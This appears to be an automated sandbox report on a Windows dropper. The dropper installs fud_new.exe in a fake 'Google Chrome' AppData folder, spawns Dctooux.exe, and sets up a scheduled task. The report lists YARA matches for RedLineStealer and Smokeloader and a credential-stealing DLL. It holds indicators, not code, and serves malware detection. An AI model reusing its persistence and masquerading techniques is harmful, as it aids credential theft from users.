Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 36_2_0041FEA7
Creates files inside the system directory
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F13DB0 0_2_00007FF6A4F13DB0
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F14FC0 0_2_00007FF6A4F14FC0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00409DA0 4_2_00409DA0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0043B163 4_2_0043B163
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00427101 4_2_00427101
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00424123 4_2_00424123
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044A2E9 4_2_0044A2E9
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00446448 4_2_00446448
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004294A2 4_2_004294A2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00424912 4_2_00424912
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044AA3B 4_2_0044AA3B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044AB5B 4_2_0044AB5B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0044BEA0 4_2_0044BEA0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00404FE0 4_2_00404FE0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00445FB0 4_2_00445FB0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491A550 4_2_0491A550
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F9709 4_2_048F9709
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048DA007 4_2_048DA007
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491C107 4_2_0491C107
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04916217 4_2_04916217
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048D5247 4_2_048D5247
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F438A 4_2_048F438A
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0490B3CA 4_2_0490B3CA
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F7368 4_2_048F7368
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491ACA2 4_2_0491ACA2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491ADC2 4_2_0491ADC2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F4B79 4_2_048F4B79
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00409DA0 24_2_00409DA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0043B163 24_2_0043B163
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00427101 24_2_00427101
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00424123 24_2_00424123
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044A2E9 24_2_0044A2E9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00446448 24_2_00446448
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_004294A2 24_2_004294A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00424912 24_2_00424912
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044AA3B 24_2_0044AA3B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044AB5B 24_2_0044AB5B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044BEA0 24_2_0044BEA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00404FE0 24_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00445FB0 24_2_00445FB0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490A550 24_2_0490A550
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E9709 24_2_048E9709
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048CA007 24_2_048CA007
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490C107 24_2_0490C107
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_04906217 24_2_04906217
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048C5247 24_2_048C5247
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E438A 24_2_048E438A
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048FB3CA 24_2_048FB3CA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E7368 24_2_048E7368
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490ACA2 24_2_0490ACA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490ADC2 24_2_0490ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E4B79 24_2_048E4B79
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00424123 36_2_00424123
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044A2E9 36_2_0044A2E9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00446448 36_2_00446448
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00424912 36_2_00424912
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044AA3B 36_2_0044AA3B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044AB5B 36_2_0044AB5B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00404FE0 36_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0043B163 36_2_0043B163
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00427101 36_2_00427101
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0040F420 36_2_0040F420
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_004294A2 36_2_004294A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044BEA0 36_2_0044BEA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00445FB0 36_2_00445FB0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495A550 36_2_0495A550
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04939709 36_2_04939709
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0491A007 36_2_0491A007
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495C107 36_2_0495C107
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04956217 36_2_04956217
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04915247 36_2_04915247
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0493438A 36_2_0493438A
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0494B3CA 36_2_0494B3CA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04937368 36_2_04937368
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495ACA2 36_2_0495ACA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495ADC2 36_2_0495ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04934B79 36_2_04934B79
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0492B637 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 04930BCA appears 48 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041B3D0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E0EC9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E1507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420978 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041F3F9 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420963 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041ABB0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0043C0B3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 04930EC9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 04931507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420C62 appears 153 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 004212A0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048DB637 appears 127 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 048F0EC9 appears 68 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 048F1507 appears 38 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 0041B3D0 appears 123 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 048EB637 appears 127 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 00420C62 appears 83 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 004212A0 appears 44 times
One or more processes crash
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 732
PE file contains more sections than normal
Source: GhLMDfzXqQ.exe Static PE information: Number of sections : 11 > 10
Yara signature match
Source: 00000004.00000002.2288637913.0000000002DA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2290385798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000002.2290111678.0000000002EF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000024.00000002.3366496339.0000000002E34000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000024.00000002.3368787116.0000000004910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2289959026.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/62@1/1
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_02DA35BE CreateToolhelp32Snapshot,Module32First, 4_2_02DA35BE
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 4_2_0040B385
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe File created: C:\Users\user\AppData\Roaming\Google Chrome\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4972
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2332
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File created: C:\Users\user\AppData\Local\Temp\cbb1d94791 Jump to behavior
Source: GhLMDfzXqQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: GhLMDfzXqQ.exe ReversingLabs: Detection: 47%
Source: GhLMDfzXqQ.exe Virustotal: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\GhLMDfzXqQ.exe "C:\Users\user\Desktop\GhLMDfzXqQ.exe"
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe "C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe"
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 732
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 752
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 848
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 912
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 932
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 932
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1028
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1100
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1128
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1180
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 472
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 536
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 544
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe "C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wintypes.dll Jump to behavior
